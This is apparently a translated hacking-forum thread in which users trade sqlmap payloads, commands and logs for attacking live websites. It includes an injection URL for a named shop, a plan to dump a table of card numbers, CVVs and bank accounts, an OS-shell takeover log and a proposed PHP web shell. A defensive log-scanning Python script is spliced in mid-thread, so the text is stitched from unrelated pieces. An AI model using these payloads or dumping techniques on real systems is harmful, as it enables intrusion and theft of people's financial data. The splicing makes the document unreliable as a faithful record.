Questions about SQLMap

Discussion in 'Vulnerabilities' started by randman, 1 Oct 2015.

  1. t0ma5

    masterdolicjakov
    sinfo
    does your religion forbid turning on debug in sqlmap and looking at which requests aren't working?
     
  2. masterdolicjakov

    Good day to you!
    Sorry, could you be more specific?
     
  3. sinfo

    [12:47:12] [INFO] testing MySQL
    [12:47:12] [PAYLOAD] -8319
    [12:47:21] [WARNING] reflective value(s) found and filtering out
    [12:47:21] [DEBUG] searching for error chunk length...
    [12:47:21] [PAYLOAD] -8315) OR 1 GROUP BY CONCAT(0x7170627071,(SELECT REPEAT(0x34,1024)),0x716b767a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#
    [12:47:51] [WARNING] turning off pre-connect mechanism because of connection time out(s)
    [12:47:51] [CRITICAL] connection timed out to the target URL or proxy. sqlmap is going to retry the request(s)
     
  4. BabaDook

    PHP:
     http://vapenw.com:80/catalogsearch/result/?cat=-3835)+ and extractvalue(0x0a,concat(0x0a,(select database()))) +--+-&product_finished=52&q=1&rating=2
     
  5. sinfo

    And how do I work it in sqlmap?
     
  6. BabaDook

    no idea
     
  7. androd

    Please help me solve a problem.
    I have a table
    Table: order_master_admin
    [55 columns]
    +-------------------------+--------------+
    | Column | Type |
    +-------------------------+--------------+
    | timestamp | varchar(100) |
    | address_1 | varchar(255) |
    | address_2 | varchar(255) |
    | bank_acc_hold_name | varchar(50) |
    | bank_acc_no | varchar(16) |
    | bank_cheque_no | varchar(5) |
    | bank_name | varchar(50) |
    | bank_route_no | varchar(10) |
    | cc_cust_name | varchar(50) |
    | cce_month | varchar(2) |
    | cce_year | varchar(4) |
    | ccno | varchar(16) |
    | city | varchar(255) |
    | comment | blob |
    | country | varchar(255) |
    | cvv_no | varchar(3) |
    | date_modified | datetime |
    | dob | varchar(50) |
    | email | varchar(100) |
    | fingerprint | varchar(255) |
    | first_name | varchar(50) |
    | invoice_id | varchar(50) |
    | ipaddress | varchar(50) |
    | language_id | int(11) |
    | last_name | varchar(50) |
    | mobile | varchar(255) |
    | notify | int(2) |
    | notify_date | datetime |
    | order_id | varchar(50) |
    | order_status_id | varchar(100) |
    | order_time | datetime |
    | password | varchar(50) |
    | payment_address_format | blob |
    | payment_mode | varchar(50) |
    | payment_status | varchar(50) |
    | phone | varchar(255) |
    | return_code | varchar(10) |
    | return_message | varchar(50) |
    | ship_amount | varchar(25) |
    | ship_type | varchar(100) |
    | shipping_address1 | varchar(50) |
    | shipping_address2 | varchar(50) |
    | shipping_address_format | blob |
    | shipping_city | varchar(50) |
    | shipping_country | varchar(50) |
    | shipping_firstname | varchar(50) |
    | shipping_lastname | varchar(50) |
    | shipping_pin | varchar(50) |
    | shipping_state | varchar(50) |
    | state | varchar(255) |
    | total_amount | varchar(100) |
    | transaction_id | varchar(100) |
    | userid | varchar(50) |
    | userlevel | varchar(50) |
    | zipcode | varchar(255) |
    +-------------------------+--------------+
    When dumping, I need to dump only these columns
    | ship_amount | varchar(25) |
    | ship_type | varchar(100) |
    | shipping_address1 | varchar(50) |
    | shipping_address2 | varchar(50) |
    | shipping_address_format | blob |
    | shipping_city | varchar(50) |
    | shipping_country | varchar(50) |
    | shipping_firstname | varchar(50) |
    | shipping_lastname | varchar(50) |
    | shipping_pin | varchar(50) |
    | shipping_state | varchar(50) |
    And the dump needs to run not from start to end but from end to start.
    That is, there are 100k rows there and I need the dump starting from row 95k; how do I do that?
     
  8. t0ma5

    there's the where parameter
    Code:
    python ../sqlmapproject-sqlmap-ad612bf/sqlmap.py --help | grep where
        --where=DUMPWHERE   Use WHERE condition while table dumping
    
    grab a tambourine and dance)

    Code:
    -C COL              DBMS database table column(s) to enumerate
    
    that's for the columns

    "That is, there are 100k rows there and I need the dump starting from row 95k; how do I do that?" I don't think anyone here is going to teach you how LIMIT works in MySQL -_-
     
  9. sinfo

    I'm trying to dump it with a dumper; it dumps, but slowly(. sqlmap outputs this

    [13:30:30] [INFO] the back-end DBMS is Microsoft SQL Server
    web server operating system: Windows 8.1 or 2012 R2
    web application technology: ASP.NET, Microsoft IIS 8.5, ASP
    back-end DBMS: Microsoft SQL Server 2008
    [13:30:30] [INFO] fetching columns for table 'Master' in database 'cation'
    [13:30:30] [INFO] the SQL query used returns 54 entries
    [13:30:30] [INFO] starting 10 threads
    [13:30:31] [INFO] fetching entries for table 'tMaster' in database 'cation'
    [13:30:31] [INFO] resumed:
    [13:30:31] [INFO] fetching number of entries for table 'Masterster' in database 'master'
    [13:30:31] [INFO] retrieved:
    [13:30:31] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
    [13:30:31] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
    [13:30:36] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
    [13:30:37] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
    [13:30:37] [WARNING] unable to retrieve the number of entries for table 'Master' in database 'cation'
    [13:30:37] [WARNING] HTTP error codes detected during run:
    500 (Internal Server Error) - 38 times
     
  10. Sensoft

    Guys, what are the shell commands in sqlmap?
    How do I upload a proper shell?
    Code:
    [18:27:05] [INFO] fingerprinting the back-end DBMS operating system
    [18:27:05] [INFO] the back-end DBMS operating system is Linux
    [18:27:06] [INFO] testing if current user is DBA
    [18:27:06] [INFO] fetching current user
    [18:27:07] [WARNING] reflective value(s) found and filtering out
    [18:27:07] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
    [18:27:07] [WARNING] functionality requested probably does not work because the curent session user is not a database administrator
    what is the back-end database management system architecture?
    [1] 32-bit (default)
    [2] 64-bit
    >
    [18:27:09] [INFO] checking if UDF 'sys_eval' already exist
    [18:27:10] [INFO] checking if UDF 'sys_exec' already exist
    [18:27:11] [INFO] detecting back-end DBMS version from its banner
    [18:27:11] [INFO] retrieving MySQL plugin directory absolute path
    [18:27:12] [WARNING] possible server trimmed output detected (probably due to its length and/or content): ' in 'where clause'
    [18:27:12] [INFO] resumed: /usr/lib/mysql/plugin/
    [18:27:39] [WARNING] time-based comparison requires larger statistical model, please wait........................ (done)
    [18:27:53] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process user has no write privileges in the destination path)
    [18:27:54] [ERROR] there has been a problem uploading the shared library, it looks like the binary file has not been written on the database underlying file system
    do you want to proceed anyway? Beware that the operating system takeover will fail [y/N] y
    [18:27:58] [INFO] creating UDF 'sys_eval' from the binary UDF file
    [18:27:59] [INFO] creating UDF 'sys_exec' from the binary UDF file
    [18:28:01] [INFO] going to use injected sys_eval and sys_exec user-defined functions for operating system command execution
    [18:28:01] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTER
    os-shell>
    link to the screenshot http://i78.fastpic.ru/big/2016/1011/51/95e59ecf6cd1aaa9d13c2654e755fd51.png
     
  11. LeninDie

    looks like I've found a SQLi
    screenshot: http://ipic.su/img/img7/fs/kiss_16kb.1476215719.png
    but when I try to work it with sqlmap nothing comes of it. I've already done the full request as in the program, via a file and with the -r switch. the original value is mailid=7581, sqlmap.py -u "https://host/file.php?mailid=7581" --cookie="blablabla" -p mailid --dbms=mysql --level=5 --risk=3 --current-db - the request is put together correctly, isn't it?! the mysql service is running on the server. tell me where to dig, maybe I'm doing something wrong? during the check it says the parameter might be vulnerable, but in the end it's a false positive
     
    #271 LeninDie, 11 Oct 2016
    Last edited: 11 Oct 2016
  12. sinfo

    false positive - that's normal
     
  13. Sensoft

    --dbms? maybe --dbs
     
  14. sinfo

    I have a question: I'm trying to dump a DB, but it contains words in Cyrillic, and in the dump they look like this: ???????. What can be done?

    --charset=windows-1251 doesn't help(

    If hex, then \xec\xe0\xf0\xea\xe5\xf2\xee\xeb\xee\xe3
     
    #274 sinfo, 11 Oct 2016
    Last edited: 11 Oct 2016
  15. passwd

    Can you tell me the simplest way to work Stacked Queries?
    ---
    Parameter: q (GET)
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: q=123';WAITFOR DELAY '0:0:5'--&c=123
    ---

    Pulling the databases takes very long. Maybe one could find a value in the database that is displayed on the page and UPDATE that value, adding "<?php system($_GET["cmd"]); ?>", and then upload a shell? What is the general vector for working Stacked Queries if there is no access to the admin panel (and current user is DBA: False)?
     
  16. Metal0l

    please tell me how to work a SQLi of this type: http://site.ru/search?search_id=activetopics+AND+1=1+--+
    I got it by scanning the site with ZAP. I've tried everything, raised risk and level too. Thanks in advance
     
  17. t0ma5

    what exactly isn't working?
     
  18. Metal0l

    I can't get access to the DB.
     
  19. t0ma5

    that much is clear; if it had worked, you wouldn't be writing here

    http://site.ru/search?search_id=activetopics+AND+1=1+--+
    http://site.ru/search?search_id=activetopics+AND+1=2+--+

    does the information on the page differ?
    honestly, I find it hard to believe there's an injection here, because I don't see the input landing inside the query: a string value would in any case have to be inside some kind of quotes/apostrophes; possibly the search syntax simply supports logical operators and the scanner just got it wrong
     
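From the defender's side, the payload shapes quoted in this thread (the FLOOR(RAND(0)*2) GROUP BY ... HAVING and extractvalue() error-based probes in posts 3 and 4, the WAITFOR DELAY stacked query in post 15, and the AND 1=1 / AND 1=2 pair in post 19) are exactly what a sqlmap run leaves behind in a web server's access log. The following added example (not from the thread, not sqlmap's own code) scans constructed Apache-style log lines for those signatures and counts HTTP 500 responses per client, the same figure sqlmap summarises as '500 (Internal Server Error) - 38 times' above; the log format, IP addresses and threshold are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Payload shapes quoted in this thread (constructed signatures, deliberately narrow).
SIGNATURES = {
    "error-based: extractvalue()": re.compile(r"extractvalue\s*\(", re.I),
    "error-based: FLOOR(RAND(0)*2) GROUP BY ... HAVING":
        re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\).*having", re.I | re.S),
    "time-based: WAITFOR DELAY": re.compile(r"waitfor\s+delay", re.I),
    "boolean probe: AND 1=1 / AND 1=2": re.compile(r"\band\s+1\s*=\s*[12]\b", re.I),
}
# Assumed combined-log shape: ip ident user [time] "METHOD path proto" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

def classify(path):
    """Return the signature names that match one URL-decoded request path."""
    decoded = unquote_plus(path)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def analyze(lines, error_threshold=5):
    """Group by client IP: matched signatures plus the number of HTTP 500 responses.
    Report a client if any signature matched or it triggered >= error_threshold 500s."""
    per_ip = defaultdict(lambda: {"signatures": set(), "errors": 0, "requests": 0})
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # unparsable line: skip rather than guess
        rec = per_ip[m["ip"]]
        rec["requests"] += 1
        rec["signatures"].update(classify(m["path"]))
        if m["status"] == "500":
            rec["errors"] += 1
    return {ip: r for ip, r in per_ip.items()
            if r["signatures"] or r["errors"] >= error_threshold}

# Constructed sample lines; IPs are documentation ranges, paths mirror the thread's payloads.
SAMPLE_LOG = [
    '203.0.113.7 - - [11/Oct/2016:12:47:21 +0300] "GET /catalogsearch/result/?q=-8315)%20OR%201%20GROUP%20BY%20CONCAT(0x7170627071,FLOOR(RAND(0)*2))%20HAVING%20MIN(0)%23 HTTP/1.1" 500 1203',
    '203.0.113.7 - - [11/Oct/2016:12:47:22 +0300] "GET /catalogsearch/result/?cat=-3835)+and+extractvalue(0x0a,concat(0x0a,(select+database())))+--+- HTTP/1.1" 500 1203',
    '203.0.113.7 - - [11/Oct/2016:13:30:31 +0300] "GET /search.aspx?q=123%27;WAITFOR+DELAY+%270:0:5%27--&c=123 HTTP/1.1" 200 3110',
    '198.51.100.4 - - [11/Oct/2016:14:00:00 +0300] "GET /search?search_id=activetopics+AND+1=1+--+ HTTP/1.1" 200 3110',
    '198.51.100.4 - - [11/Oct/2016:14:00:01 +0300] "GET /search?search_id=activetopics+AND+1=2+--+ HTTP/1.1" 200 2990',
    '192.0.2.9 - - [11/Oct/2016:14:05:00 +0300] "GET /catalogsearch/result/?q=shoes HTTP/1.1" 200 5521',
]

if __name__ == "__main__":
    for ip, rec in analyze(SAMPLE_LOG).items():
        print(ip, rec["requests"], "requests,", rec["errors"], "x HTTP 500,", sorted(rec["signatures"]))
```

The boolean-probe pattern alone is noisy on search forms that accept logical operators (the very ambiguity t0ma5 raises above), so in practice it is best weighted together with the 500 count and the other signatures from the same client.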
  20. Metal0l

    Yes, to be honest I also suspected a scanner error. The information does differ. I get a message about an unidentified error and a request to contact the site administrator.